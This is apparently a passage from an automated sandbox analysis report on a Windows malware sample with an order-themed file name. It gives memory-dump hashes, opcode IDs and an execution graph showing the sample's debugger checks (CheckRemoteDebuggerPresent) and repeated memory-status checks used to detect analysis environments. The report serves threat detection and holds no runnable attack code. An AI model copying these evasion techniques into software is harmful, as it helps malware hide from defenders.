                                                                        • Snapshot File: hcaresult_0_2_5c00000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: acf0ba0cbba685fd9ca75a38f2937c1fdb7e61fc91737e54e0f5e72d853d8ed4
                                                                        • Instruction ID: 5a13e0d185d3f3d75cd2a5fe48aa3dec7140704b43bd2b614d714abadca01bcd
                                                                        • Opcode Fuzzy Hash: acf0ba0cbba685fd9ca75a38f2937c1fdb7e61fc91737e54e0f5e72d853d8ed4
                                                                        • Instruction Fuzzy Hash: A241E0B4D002589FDB14CFE9C885AADBBF1BB09314F209429E816BB290D774A985CF45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7403540a317565223b3e7c92c82d20ddc00512731318c67529558cdbfa009660
                                                                        • Instruction ID: e69ed861f6252ef8bf71df7c5219d284abda5c26c31fb32b8a27d367c344beca
                                                                        • Opcode Fuzzy Hash: 7403540a317565223b3e7c92c82d20ddc00512731318c67529558cdbfa009660
                                                                        • Instruction Fuzzy Hash: D341F671E00218CBDB24CFAAD888BEDBBB2FF89344F04D1AAD599A7250DB305945CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650051244.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5c00000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7a920cb1ae31c19cefe23208e8f344e00a5188299d612a99e029b9810268f528
                                                                        • Instruction ID: 3492dbe2fbef7bae6c4bab9c7bfff69e9b3e68b1bff6f1709476229f7b1a8da9
                                                                        • Opcode Fuzzy Hash: 7a920cb1ae31c19cefe23208e8f344e00a5188299d612a99e029b9810268f528
                                                                        • Instruction Fuzzy Hash: B25110B1D016588BEB6CCF6B8D443CAFAF3AFC8301F14C1FA955CA6254DB7406858E44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb0d4e6e2bac323d029f16de8eaf267e31ee816ff26bff6c6fcd93ab00460e3d
                                                                        • Instruction ID: bf4c02a09fe45aab6cda6ae6c4a5bdbf8e0df2c25fb6c414fd616b654175969d
                                                                        • Opcode Fuzzy Hash: fb0d4e6e2bac323d029f16de8eaf267e31ee816ff26bff6c6fcd93ab00460e3d
                                                                        • Instruction Fuzzy Hash: 4D415FB1E05A588FEB68CF6B8C4169AFAF3BFC9301F14C1BAD40CAA255DB3055459F01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 58d9618324fd2195f9e78a676e9f00d7d7e520e1de4b5f86bcbb629a62ffe059
                                                                        • Instruction ID: 39b8ba721842168da61d5bc051f31dbc2f00fd553c0936500b83e51873e310e6
                                                                        • Opcode Fuzzy Hash: 58d9618324fd2195f9e78a676e9f00d7d7e520e1de4b5f86bcbb629a62ffe059
                                                                        • Instruction Fuzzy Hash: 0C41F971E01219CBDB24CFAAD848BEDBBB2FF89340F04D166D599A7251DB344945CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 60428705bc2a00ce530a4859f981d7f1e03f2841ae4358087ca806e6756d9828
                                                                        • Instruction ID: 19379c4cac460a76f6147b9c73b14bd2ec234285af402ac89b446a35506de243
                                                                        • Opcode Fuzzy Hash: 60428705bc2a00ce530a4859f981d7f1e03f2841ae4358087ca806e6756d9828
                                                                        • Instruction Fuzzy Hash: 6641F1B5D04258DFCB00CFA9D580AEEFBF0BB49310F24902AE445B7240C738AA45CF68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650663027.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5d10000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 217ee6cc5e7568b83ad5326b5ea7f645fdcaa8d23424a5f6f6566fc82150b61d
                                                                        • Instruction ID: f92006ad2e6cab98001da13f56a0aba935e0a89e2205de3edd6c8d23d9bc44f1
                                                                        • Opcode Fuzzy Hash: 217ee6cc5e7568b83ad5326b5ea7f645fdcaa8d23424a5f6f6566fc82150b61d
                                                                        • Instruction Fuzzy Hash: 8941E0B5D04258DFCB00CFA9D484AEEFBF0BB49310F14906AE455B7240C738AA85CFA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650702212.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e874c9ef4b690a408c6aea613dfd522fd808de7f94f74445a12b50bc9b1d899b
                                                                        • Instruction ID: 6dc9069aa134eadaaad14f652c8d528a341ea738e7ac6c2b4a8540aee25d3d9e
                                                                        • Opcode Fuzzy Hash: e874c9ef4b690a408c6aea613dfd522fd808de7f94f74445a12b50bc9b1d899b
                                                                        • Instruction Fuzzy Hash: 3E315E70D053949FEB69CF6A8C08299BBF2AFC5200F05C0FAD458AA265DB740985DF11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1650702212.0000000005E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5e60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 531e75d615dc3744026cc9b1becfd54ce69e3a2e2751b0eb3a440e64a97287b6
                                                                        • Instruction ID: 5e3c87fcef6049a8ab97464a9248a09587907379093071b651b5a48898629ca9
                                                                        • Opcode Fuzzy Hash: 531e75d615dc3744026cc9b1becfd54ce69e3a2e2751b0eb3a440e64a97287b6
                                                                        • Instruction Fuzzy Hash: 0F31DC70E05229DBDB68CF5AC948699FAF6BF88300F04D1FAD858A6254EB741A81DF41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1636454530.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2f60000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: da14886d2b1aa1bdb77fb84b18f3821e26a695f4a233187d88514455de58e9da
                                                                        • Instruction ID: 3b1eefe387f24e54c79b6ac79669bdda6d06c48a7072ec9a6dc2085d132f5b19
                                                                        • Opcode Fuzzy Hash: da14886d2b1aa1bdb77fb84b18f3821e26a695f4a233187d88514455de58e9da
                                                                        • Instruction Fuzzy Hash: BA218E76D046588BDB68CF5BDD442DDFBF3AFC9301F04C0BA9419AA654DB340A458F41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1648899082.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5ad0000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                                                        • API String ID: 0-723292480
                                                                        • Opcode ID: fa996e5f33c0ca76103c702ae68ac8a804eb7974d250f9d5be78c0003ed38b8e
                                                                        • Instruction ID: 25e16390e72eee18ad6ce184d5cdd56d84365970c1e0cc12a1f26f2eba62dba0
                                                                        • Opcode Fuzzy Hash: fa996e5f33c0ca76103c702ae68ac8a804eb7974d250f9d5be78c0003ed38b8e
                                                                        • Instruction Fuzzy Hash: 68D14F32A00119DFCB09DF64C954DAABBB2FF88310F054498E50AAB275DB36ED56DF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649183304.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_5b40000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5$6$;$I
                                                                        • API String ID: 0-753759495
                                                                        • Opcode ID: 24a6057fbd0d3e5ae8dac2b525bdda98ffe8ca781a5489e513009f65311accac
                                                                        • Instruction ID: fc6478d0d2dc0028d7483cebc8dbb02c76f53ef4843e8d0cc19f741c0740e2e5
                                                                        • Opcode Fuzzy Hash: 24a6057fbd0d3e5ae8dac2b525bdda98ffe8ca781a5489e513009f65311accac
                                                                        • Instruction Fuzzy Hash: 1C21043090122DCFDB60EF64C998BAEBAB2FB48340F1011E9D609BB290C7346E84DF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:11.8%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:1.9%
                                                                        Total number of Nodes:155
                                                                        Total number of Limit Nodes:19
                                                                        execution_graph 40142 1147040 40143 1147084 CheckRemoteDebuggerPresent 40142->40143 40144 11470c6 40143->40144 40135 666d080 40136 666d0c2 40135->40136 40137 666d0c8 LoadLibraryExW 40135->40137 40136->40137 40138 666d0f9 40137->40138 40139 6664960 40140 6664966 DuplicateHandle 40139->40140 40141 66649f6 40140->40141 40145 1140848 40147 114084e 40145->40147 40146 114091b 40147->40146 40151 6663600 40147->40151 40155 6663610 40147->40155 40159 1141320 40147->40159 40152 666361f 40151->40152 40165 6662ff8 40152->40165 40156 666361f 40155->40156 40157 6662ff8 4 API calls 40156->40157 40158 6663640 40157->40158 40158->40147 40164 114132b 40159->40164 40160 114144a 40160->40147 40164->40160 40283 1148200 40164->40283 40293 11480e8 40164->40293 40297 11480d8 40164->40297 40166 6663003 40165->40166 40169 666449c 40166->40169 40168 6664fc6 40168->40168 40170 66644a7 40169->40170 40171 66656ec 40170->40171 40174 6666f67 40170->40174 40178 6666f68 40170->40178 40171->40168 40176 6666f68 40174->40176 40175 6666fad 40175->40171 40176->40175 40182 6667118 40176->40182 40179 6666f89 40178->40179 40180 6666fad 40179->40180 40181 6667118 4 API calls 40179->40181 40180->40171 40181->40180 40183 6667125 40182->40183 40184 666715e 40183->40184 40186 66654ac 40183->40186 40184->40175 40187 66654b7 40186->40187 40189 66675d0 40187->40189 40190 66654bc 40187->40190 40189->40189 40191 66654c7 40190->40191 40197 6667194 40191->40197 40193 666763f 40201 666c948 40193->40201 40210 666c960 40193->40210 40194 6667679 40194->40189 40200 666719f 40197->40200 40198 66688c8 40198->40193 40199 6666f68 4 API calls 40199->40198 40200->40198 40200->40199 40203 666c991 40201->40203 40204 666ca91 40201->40204 40202 666c99d 40202->40194 40203->40202 40219 666cbc8 40203->40219 40224 666cbd8 40203->40224 40204->40194 40205 666c9dd 40228 666ded8 40205->40228 40237 666dec9 40205->40237 40212 666ca91 40210->40212 40213 666c991 40210->40213 40211 666c99d 40211->40194 40212->40194 40213->40211 40217 666cbc8 3 API calls 40213->40217 40218 666cbd8 3 API calls 40213->40218 40214 666c9dd 40215 666ded8 2 API calls 40214->40215 40216 666dec9 2 API calls 40214->40216 40215->40212 40216->40212 40217->40214 40218->40214 40220 666cbd8 40219->40220 40246 666cc28 40220->40246 40255 666cc18 40220->40255 40221 666cbe2 40221->40205 40226 666cc28 2 API calls 40224->40226 40227 666cc18 2 API calls 40224->40227 40225 666cbe2 40225->40205 40226->40225 40227->40225 40229 666df03 40228->40229 40264 666e440 40229->40264 40269 666e430 40229->40269 40230 666df86 40231 666bdf0 GetModuleHandleW 40230->40231 40233 666dfb2 40230->40233 40232 666dff6 40231->40232 40234 666edc5 CreateWindowExW 40232->40234 40234->40233 40238 666ded8 40237->40238 40243 666e440 GetModuleHandleW 40238->40243 40244 666e430 GetModuleHandleW 40238->40244 40239 666df86 40242 666dfb2 40239->40242 40274 666bdf0 40239->40274 40243->40239 40244->40239 40247 666cc39 40246->40247 40250 666cc5c 40246->40250 40248 666bdf0 GetModuleHandleW 40247->40248 40249 666cc44 40248->40249 40249->40250 40254 666ceb2 GetModuleHandleW 40249->40254 40250->40221 40251 666ce60 GetModuleHandleW 40253 666ce8d 40251->40253 40252 666cc54 40252->40250 40252->40251 40253->40221 40254->40252 40256 666cc1d 40255->40256 40257 666bdf0 GetModuleHandleW 40256->40257 40259 666cc5c 40256->40259 40258 666cc44 40257->40258 40258->40259 40263 666ceb2 GetModuleHandleW 40258->40263 40259->40221 40260 666cc54 40260->40259 40261 666ce60 GetModuleHandleW 40260->40261 40262 666ce8d 40261->40262 40262->40221 40263->40260 40266 666e46d 40264->40266 40265 666e4ee 40266->40265 40267 666e5a0 GetModuleHandleW 40266->40267 40268 666e5b0 GetModuleHandleW 40266->40268 40267->40265 40268->40265 40270 666e440 40269->40270 40271 666e4ee 40270->40271 40272 666e5a0 GetModuleHandleW 40270->40272 40273 666e5b0 GetModuleHandleW 40270->40273 40272->40271 40273->40271 40275 666ce18 GetModuleHandleW 40274->40275 40277 666ce8d 40275->40277 40278 666edc5 40277->40278 40279 666edc9 40278->40279 40280 666edfd CreateWindowExW 40278->40280 40279->40242 40282 666ef34 40280->40282 40282->40282 40284 114820a 40283->40284 40285 114824c 40284->40285 40301 667f9b8 40284->40301 40306 667f9a9 40284->40306 40290 114827f 40285->40290 40321 6660601 40285->40321 40286 114821d 40311 114f1e0 40286->40311 40316 114f1f0 40286->40316 40290->40164 40294 11480fe 40293->40294 40295 6660601 2 API calls 40294->40295 40296 114827f 40294->40296 40295->40296 40296->40164 40298 11480fe 40297->40298 40299 6660601 2 API calls 40298->40299 40300 114827f 40298->40300 40299->40300 40300->40164 40302 667f9cd 40301->40302 40303 667fbde 40302->40303 40304 667fc08 GlobalMemoryStatusEx GlobalMemoryStatusEx 40302->40304 40305 667fbf8 GlobalMemoryStatusEx GlobalMemoryStatusEx 40302->40305 40303->40286 40304->40302 40305->40302 40308 667f9b5 40306->40308 40307 667fbde 40307->40286 40308->40307 40309 667fc08 GlobalMemoryStatusEx GlobalMemoryStatusEx 40308->40309 40310 667fbf8 GlobalMemoryStatusEx GlobalMemoryStatusEx 40308->40310 40309->40308 40310->40308 40313 114f20a 40311->40313 40312 114f451 40312->40285 40313->40312 40314 667fc08 GlobalMemoryStatusEx GlobalMemoryStatusEx 40313->40314 40315 667fbf8 GlobalMemoryStatusEx GlobalMemoryStatusEx 40313->40315 40314->40313 40315->40313 40318 114f20a 40316->40318 40317 114f451 40317->40285 40318->40317 40319 667fc08 GlobalMemoryStatusEx GlobalMemoryStatusEx 40318->40319 40320 667fbf8 GlobalMemoryStatusEx GlobalMemoryStatusEx 40318->40320 40319->40318 40320->40318 40323 114f1f0 2 API calls 40321->40323 40324 114f1e0 2 API calls 40321->40324 40322 666060c 40322->40290 40323->40322 40324->40322
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                        • API String ID: 0-2392861976
                                                                        • Opcode ID: fdabb3cb0f970290d554990d10aeeb8e98c6a68f5543eaee9f8facf8cb5ade91
                                                                        • Instruction ID: 3b883e22657618e1fa1febf77a63ad7b1645c32c26e320ea696b3f124fba8b43
                                                                        • Opcode Fuzzy Hash: fdabb3cb0f970290d554990d10aeeb8e98c6a68f5543eaee9f8facf8cb5ade91
                                                                        • Instruction Fuzzy Hash: 6C822830E106198FCB64DF64C994A9DB7B2FF89304F54C6A9D449AB364EB31ED85CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                        • API String ID: 0-2392861976
                                                                        • Opcode ID: 864b43314d149f575a0deb1f3c94708452aa03ef68e0399462c14ec9170df858
                                                                        • Instruction ID: dbcff989051ef36712ed5fb45fd9479cb646d30671ac239de45cf0a0c7cacaf4
                                                                        • Opcode Fuzzy Hash: 864b43314d149f575a0deb1f3c94708452aa03ef68e0399462c14ec9170df858
                                                                        • Instruction Fuzzy Hash: E9529030E102098FDF64DFA8D594BAEB7B2FB85310F20892AE415EB355DA35DC85CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2200 6677dc8-6677de6 2202 6677de8-6677deb 2200->2202 2203 6677e0e-6677e11 2202->2203 2204 6677ded-6677e09 2202->2204 2205 6677e13-6677e2d 2203->2205 2206 6677e32-6677e35 2203->2206 2204->2203 2205->2206 2207 6677e37-6677e45 2206->2207 2208 6677e4c-6677e4f 2206->2208 2218 6677e47 2207->2218 2219 6677e6e-6677e84 2207->2219 2211 6677e51-6677e5b 2208->2211 2212 6677e5c-6677e5e 2208->2212 2214 6677e65-6677e68 2212->2214 2215 6677e60 2212->2215 2214->2202 2214->2219 2215->2214 2218->2208 2221 667809f-66780a9 2219->2221 2222 6677e8a-6677e93 2219->2222 2223 66780aa-66780b2 2222->2223 2224 6677e99-6677eb6 2222->2224 2227 66780b4-66780b6 2223->2227 2228 66780b9-66780ba 2223->2228 2235 667808c-6678099 2224->2235 2236 6677ebc-6677ee4 2224->2236 2230 66780bd-66780bf 2227->2230 2231 66780b8 2227->2231 2232 66780c1-66780df 2228->2232 2233 66780bc 2228->2233 2230->2232 2231->2228 2234 66780e1-66780e4 2232->2234 2233->2230 2237 6678191-6678194 2234->2237 2238 66780ea-66780f6 2234->2238 2235->2221 2235->2222 2236->2235 2257 6677eea-6677ef3 2236->2257 2239 66781b7-66781ba 2237->2239 2240 6678196-66781b2 2237->2240 2242 6678101-6678103 2238->2242 2243 66781c0-66781cf 2239->2243 2244 66783ef-66783f1 2239->2244 2240->2239 2245 6678105-667810b 2242->2245 2246 667811b-667811f 2242->2246 2258 66781d1-66781ec 2243->2258 2259 66781ee-6678232 2243->2259 2248 66783f3 2244->2248 2249 66783f8-66783fb 2244->2249 2252 667810f-6678111 2245->2252 2253 667810d 2245->2253 2254 6678121-667812b 2246->2254 2255 667812d 2246->2255 2248->2249 2249->2234 2256 6678401-667840a 2249->2256 2252->2246 2253->2246 2260 6678132-6678134 2254->2260 2255->2260 2257->2223 2262 6677ef9-6677f15 2257->2262 2258->2259 2270 66783c3-66783d9 2259->2270 2271 6678238-6678249 2259->2271 2263 6678136-6678139 2260->2263 2264 667814b-6678184 2260->2264 2268 6677f1b-6677f45 2262->2268 2269 667807a-6678086 2262->2269 2263->2256 2264->2243 2288 6678186-6678190 2264->2288 2289 6678070-6678075 2268->2289 2290 6677f4b-6677f73 2268->2290 2269->2235 2269->2257 2270->2244 2279 667824f-667826c 2271->2279 2280 66783ae-66783bd 2271->2280 2279->2280 2291 6678272-6678368 call 66765e8 2279->2291 2280->2270 2280->2271 2289->2269 2290->2289 2297 6677f79-6677fa7 2290->2297 2340 6678376 2291->2340 2341 667836a-6678374 2291->2341 2297->2289 2302 6677fad-6677fb6 2297->2302 2302->2289 2303 6677fbc-6677fee 2302->2303 2311 6677ff0-6677ff4 2303->2311 2312 6677ff9-6678015 2303->2312 2311->2289 2314 6677ff6 2311->2314 2312->2269 2315 6678017-667806e call 66765e8 2312->2315 2314->2312 2315->2269 2342 667837b-667837d 2340->2342 2341->2342 2342->2280 2343 667837f-6678384 2342->2343 2344 6678386-6678390 2343->2344 2345 6678392 2343->2345 2346 6678397-6678399 2344->2346 2345->2346 2346->2280 2347 667839b-66783a7 2346->2347 2347->2280
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $^q$$^q
                                                                        • API String ID: 0-355816377
                                                                        • Opcode ID: 43d9dde4bfa8d3c9de4cd75a15d53cbf7ef0661ba5c2537abd817a0a2a799140
                                                                        • Instruction ID: b3c0bf0038fa28021f513f0e1b1d876775419b1928b2e306c2c4df0917540384
                                                                        • Opcode Fuzzy Hash: 43d9dde4bfa8d3c9de4cd75a15d53cbf7ef0661ba5c2537abd817a0a2a799140
                                                                        • Instruction Fuzzy Hash: 97029F30B1020A9FDB54DBA8D994AAEB7E2FF84314F148539E405DB395DB35EC86CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.4093285216.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6670000_T_240369_S#U0130PAR#U0130S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: p
                                                                        • API String ID: 0-2181537457
                                                                        • Opcode ID: 6c93a30e7f3dc5207d26eb2fc66ae91de4ead43c86fe3d0d9b7a7fb8e881babc
                                                                        • Instruction ID: 9855703fd78c3af8ce41c9b2c75dad841030b3bf57bde00b7fc4df3c64773a7b
                                                                        • Opcode Fuzzy Hash: 6c93a30e7f3dc5207d26eb2fc66ae91de4ead43c86fe3d0d9b7a7fb8e881babc
                                                                        • Instruction Fuzzy Hash: 55326030F102099FDF54DB68D990BAEBBB2FB88314F108529E505EB795DB35EC428B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2920 66755e8-6675605 2922 6675607-667560a 2920->2922 2923 667560c-6675613 2922->2923 2924 6675618-667561b 2922->2924 2923->2924 2925 667561d-6675623 2924->2925 2926 667562a-667562d 2924->2926 2927 6675625 2925->2927 2928 667562f-6675639 2925->2928 2926->2928 2929 6675647-667564a 2926->2929 2927->2926 2936 6675640-6675642 2928->2936 2930 667564c-6675652 2929->2930 2931 6675659-667565c 2929->2931 2932 6675654 2930->2932 2933 6675671-6675674 2930->2933 2934 6675663-6675666 2931->2934 2935 667565e-6675660 2931->2935 2932->2931 2939 6675679-667567c 2933->2939 2937 667566c-667566f 2934->2937 2938 6675779-667577f 2934->2938 2935->2934 2936->2929 2937->2933 2937->2939 2942 6675785 2938->2942 2943 66756fc-6675702 2938->2943 2940 6675686-6675689 2939->2940 2941 667567e-6675681 2939->2941 2944 66756a2-66756a5 2940->2944 2945 667568b-667569d 2940->2945 2941->2940 2946 667578a-667578d 2942->2946 2947 66757c3-66757f3 2943->2947 2948 6675708-6675710 2943->2948 2952 66756a7-66756b0 2944->2952 2953 66756b1-66756b4 2944->2953 2945->2944 2949 66757a3-66757a5 2946->2949 2950 667578f-667579e 2946->2950 2973 66757fd-6675800 2947->2973 2948->2947 2951 6675716-6675723 2948->2951 2954 66757a7 2949->2954 2955 66757ac-66757af 2949->2955 2950->2949 2951->2947 2960 6675729-667572d 2951->2960 2956 66756b6-66756d5 2953->2956 2957 66756da-66756dd 2953->2957 2954->2955 2955->2922 2961 66757b5-66757c2 2955->2961 2956->2957 2957->2925 2962 66756e3-66756e6 2957->2962 2965 6675732-6675735 2960->2965 2967 66756f7-66756fa 2962->2967 2968 66756e8-66756ec 2962->2968 2969 6675737-6675744 2965->2969 2970 6675749-667574c 2965->2970 2967->2943 2967->2965 2968->2961 2974 66756f2 2968->2974 2969->2970 2971 667574e-6675764 2970->2971 2972 6675769-667576c 2970->2972 2971->2972 2979 6675774-6675777 2972->2979 2980 667576e-667576f 2972->2980 2977 6675822-6675825 2973->2977 2978 6675802-6675806 2973->2978 2974->2967 2984 6675827-667582e 2977->2984 2985 667582f-6675832 2977->2985 2982 667580c-6675814 2978->2982 2983 66758ea-66758f6 2978->2983 2979->2938 2979->2946 2980->2979 2982->2983 2986 667581a-667581d 2982->2986 2996 66758fd-6675924 2983->2996 2997 66758f8 2983->2997 2987 6675854-6675857 2985->2987 2988 6675834-6675838 2985->2988 2986->2977 2990 667586f-6675872 2987->2990 2991 6675859-667586a 2987->2991 2988->2983 2989 667583e-6675846 2988->2989 2989->2983 2993 667584c-667584f 2989->2993 2994 6675874-6675878 2990->2994 2995 667588c-667588f 2990->2995 2991->2990 2993->2987 2994->2983 2999 667587a-6675882 2994->2999 3000 6675891-6675898 2995->3000 3001 667589f-66758a2 2995->3001 3002 6675926-6675929 2996->3002 2997->2996 2999->2983 3003 6675884-6675887 2999->3003 3004 66758e2-66758e9 3000->3004 3005 667589a 3000->3005 3006 66758a4-66758a8 3001->3006 3007 66758bc-66758bf 3001->3007 3008 6675937-667593a 3002->3008 3009 667592b-6675932 3002->3009 3003->2995 3005->3001 3006->2983 3014 66758aa-66758b2 3006->3014 3012 66758c1-66758cb 3007->3012 3013 66758d0-66758d2 3007->3013 3010 6675c23-6675c26 3008->3010 3011 6675940-6675ad4 3008->3011 3009->3008 3018 6675c40-6675c43 3010->3018 3019 6675c28-6675c39 3010->3019 3073 6675c0d-6675c20 3011->3073 3074 6675ada-6675ae1 3011->3074 3012->3013 3016 66758d4 3013->3016 3017 66758d9-66758dc 3013->3017 3014->2983 3015 66758b4-66758b7 3014->3015 3015->3007 3016->3017 3017->2973 3017->3004 3021 6675c45-6675c56 3018->3021 3022 6675c5d-6675c60 3018->3022 3025 6675c62-6675c69 3019->3025 3027 6675c3b 3019->3027 3021->3019 3032 6675c58 3021->3032 3022->3025 3026 6675c6e-6675c71 3022->3026 3025->3026 3030 6675c73-6675c84 3026->3030 3031 6675c8b-6675c8e 3026->3031 3027->3018 3030->3025 3040 6675c86 3030->3040 3033 6675c90-6675c95 3031->3033 3034 6675c98-6675c9b 3031->3034 3032->3022 3033->3034 3035 6675cb5-6675cb8 3034->3035 3036 6675c9d-6675cae 3034->3036 3035->3011 3039 6675cbe-6675cc1 3035->3039 3036->3025 3045 6675cb0 3036->3045 3042 6675cc3-6675cd6 3039->3042 3043 6675cd9-6675cdc 3039->3043 3040->3031 3043->3011 3046 6675ce2-6675ce5 3043->3046 3045->3035 3049 6675ce7-6675cf8 3046->3049 3050 6675cff-6675d01 3046->3050 3049->3042 3056 6675cfa 3049->3056 3051 6675d03 3050->3051 3052 6675d08-6675d0b 3050->3052 3051->3052 3052->3002 3053 6675d11-6675d1a 3052->3053 3056->3050 3075 6675ae7-6675b0a 3074->3075 3076 6675b95-6675b9c 3074->3076 3085 6675b12-6675b1a 3075->3085 3076->3073 3077 6675b9e-6675bd1 3076->3077 3089 